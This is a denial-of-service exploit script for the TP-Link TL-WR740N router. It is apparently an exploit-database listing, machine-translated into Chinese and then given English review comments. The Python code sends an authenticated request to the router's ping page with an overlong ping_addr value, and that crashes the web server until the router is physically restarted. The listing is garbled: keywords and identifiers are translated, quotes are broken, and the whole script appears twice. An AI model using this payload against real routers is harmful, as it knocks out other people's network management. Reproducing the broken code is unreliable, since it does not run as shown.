#利用标题: TP-Link TL-WR740N-缓冲区溢出'DOS'
#日期: 8/12/2023
#利用作者: Anish Feroz(Zeroxinn)
#供应商主页: http://www.tp-link.com
#版本: TP-Link TL-WR740N 3.12.11构建110915 Rel.40896N
#在: TP-Link TL-WR740N上测试
#Description:
#TP-Link TL-WR740路由器中存在缓冲区溢出漏洞:攻击者发送精心构造的请求,即可使路由器上运行的Web服务器崩溃。要恢复HTTP(Web服务器)服务,用户必须物理重启路由器。
#USAGE:
#python3目标用户名密码
#改变端口,如果需要
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python
导入请求
从请求中
导入基础64
# send_request: builds a single HTTP GET for the router's web management
# interface (port 8082 in this listing) and prints the outcome. The three
# arguments are the router address and the management username and password.
# NOTE(review): this listing has been through machine translation. Keywords,
# identifiers and header names were altered (the parameter list below no longer
# matches the {ip}/{username}/{password} placeholders used further down), so it
# is not valid Python as shown.
# Defensive context: the header of this page states that recovery needs a
# physical restart. Keeping the management interface unreachable from untrusted
# networks, using non-default admin credentials and checking the vendor for
# newer firmware are the usual controls for this class of issue.
def send_request(IP,用户名,密码):
# Base URL of the management interface. It is assigned here but never
# referenced again in the visible body.
auth_url=f'http://{ip} :8082'
# The statement that follows builds target_url: a request to the ping page under
# /userrpm/ whose ping_addr query value is a long run of filler characters --
# presumably the field whose length the firmware does not bound. For detection,
# requests to that page carrying an abnormally long ping_addr value are the
# pattern to look for in proxy or IDS logs.
target_url=F'http://{ip} :8082/userrpm/pingiframerpm.htm?ping_addr=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaadotype=pingisnew=newsendnum=4psize=64overtime=800trhops=20'
# HTTP Basic credentials: "username:password", base64-encoded for the
# Authorization header. Because the request is sent with management
# credentials, the crash is presumably reachable only by someone who can
# already log in to the web interface -- confirm on the device before relying
# on that. Base64 is an encoding, not encryption, and the URL scheme is plain
# http, so these credentials are readable by anyone on the network path.
凭据=f'{username} : {password}'
encoded_credentials=base64.b64encode(recortentials.encode())。decode()
# Request headers imitating a desktop browser that came from the diagnostic
# page (Host, Authorization, User-Agent, Accept, Referer, ...).
# NOTE(review): header names and several values were rewritten by machine
# translation and some quotes were lost, so this dict literal does not parse
# as shown.
标题={
'host': f'{ip} :8082',
'授权': f'basic {encoded_credentials}',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/95.0.4638.69
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/nigned-exchange; v=b3; q=b3; q=0.9'',Q=0.9',
'参考器: F'http://{ip} :8082/userrpm/diagnosticrpm.htm',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'Connection':'关闭'
}
# Send the request through a requests session with the headers built above.
# NOTE(review): no timeout is passed and no exception is handled, so an
# unresponsive device would leave this call blocked or end in a traceback.
session=requests.session()
响应=session.get(target_url,标头=标题)
# NOTE(review): HTTP 200 is reported as "server crashed", but a 200 only shows
# that the request was answered. A web server that has actually stopped would
# more likely surface as a connection error or timeout. When validating a fix or
# mitigation, check whether the management page still answers afterwards rather
# than relying on this message.
if antsphy.status_code==200:
打印(“服务器崩溃”)
打印(响应。文本)
其他:
# Any other status is only reported, together with its code.
打印(使用状态代码{response.status_code}'完成(f'Script)
# Entry point: prompt for the router address and the management credentials,
# then issue the single request via send_request.
# NOTE(review): the password is read with the same plain prompt as the other
# fields (presumably input() before translation), so it is echoed on the
# terminal and may end up in scrollback or session recordings.
ip_address=输入('host:'的IP地址')
用户名=输入('Enter UserName:')
密码=输入('Enter Password:')
send_request(ip_address,用户名,密码)
#日期: 8/12/2023
#利用作者: Anish Feroz(Zeroxinn)
#供应商主页: http://www.tp-link.com
#版本: TP-Link TL-WR740N 3.12.11构建110915 Rel.40896N
#在: TP-Link TL-WR740N上测试
#Description:
#TP-Link TL-WR740路由器中存在缓冲区溢出漏洞:攻击者发送精心构造的请求,即可使路由器上运行的Web服务器崩溃。要恢复HTTP(Web服务器)服务,用户必须物理重启路由器。
#USAGE:
#python3目标用户名密码
#改变端口,如果需要
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python
导入请求
从请求中
导入基础64
# send_request: builds a single HTTP GET for the router's web management
# interface (port 8082 in this listing) and prints the outcome. The three
# arguments are the router address and the management username and password.
# NOTE(review): this listing has been through machine translation. Keywords,
# identifiers and header names were altered (the parameter list below no longer
# matches the {ip}/{username}/{password} placeholders used further down), so it
# is not valid Python as shown.
def send_request(IP,用户名,密码):
# Base URL of the management interface. It is assigned here but never
# referenced again in the visible body.
auth_url=f'http://{ip} :8082'
# The statement that follows builds target_url: a request to the ping page under
# /userrpm/ whose ping_addr query value is a long run of filler characters --
# presumably the field whose length the firmware does not bound. For detection,
# requests to that page carrying an abnormally long ping_addr value are the
# pattern to look for in proxy or IDS logs.
target_url=F'http://{ip} :8082/userrpm/pingiframerpm.htm?ping_addr=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaadotype=pingisnew=newsendnum=4psize=64overtime=800trhops=20'
# HTTP Basic credentials: "username:password", base64-encoded for the
# Authorization header. Because the request is sent with management
# credentials, the crash is presumably reachable only by someone who can
# already log in to the web interface -- confirm on the device before relying
# on that. Base64 is an encoding, not encryption, and the URL scheme is plain
# http, so these credentials are readable by anyone on the network path.
凭据=f'{username} : {password}'
encoded_credentials=base64.b64encode(recortentials.encode())。decode()
# Request headers imitating a desktop browser that came from the diagnostic
# page (Host, Authorization, User-Agent, Accept, Referer, ...).
# NOTE(review): header names and several values were rewritten by machine
# translation and some quotes were lost, so this dict literal does not parse
# as shown.
标题={
'host': f'{ip} :8082',
'授权': f'basic {encoded_credentials}',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/95.0.4638.69
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/nigned-exchange; v=b3; q=b3; q=0.9'',Q=0.9',
'参考器: F'http://{ip} :8082/userrpm/diagnosticrpm.htm',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'Connection':'关闭'
}
# Send the request through a requests session with the headers built above.
# NOTE(review): no timeout is passed and no exception is handled, so an
# unresponsive device would leave this call blocked or end in a traceback.
session=requests.session()
响应=session.get(target_url,标头=标题)
# NOTE(review): HTTP 200 is reported as "server crashed", but a 200 only shows
# that the request was answered. A web server that has actually stopped would
# more likely surface as a connection error or timeout. When validating a fix or
# mitigation, check whether the management page still answers afterwards rather
# than relying on this message.
if antsphy.status_code==200:
打印(“服务器崩溃”)
打印(响应。文本)
其他:
# Any other status is only reported, together with its code.
打印(使用状态代码{response.status_code}'完成(f'Script)
# Entry point: prompt for the router address and the management credentials,
# then issue the single request via send_request.
# NOTE(review): the password is read with the same plain prompt as the other
# fields (presumably input() before translation), so it is echoed on the
# terminal and may end up in scrollback or session recordings.
ip_address=输入('host:'的IP地址')
用户名=输入('Enter UserName:')
密码=输入('Enter Password:')
send_request(ip_address,用户名,密码)